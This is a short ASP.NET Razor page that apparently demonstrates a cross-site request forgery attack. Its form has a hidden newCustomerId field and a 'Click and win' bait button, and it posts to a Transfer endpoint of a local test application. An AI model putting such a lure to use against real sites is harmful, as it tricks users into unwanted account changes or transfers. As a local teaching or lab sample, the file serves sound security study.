@{
    ViewData["Title"] = "Home Page";
}

<form action="https://localhost:7122/Home/Transfer" method="post">

    <input type="hidden" name="newCustomerId" value="3"/>
    <input type="submit" value="Click and win" />
</form>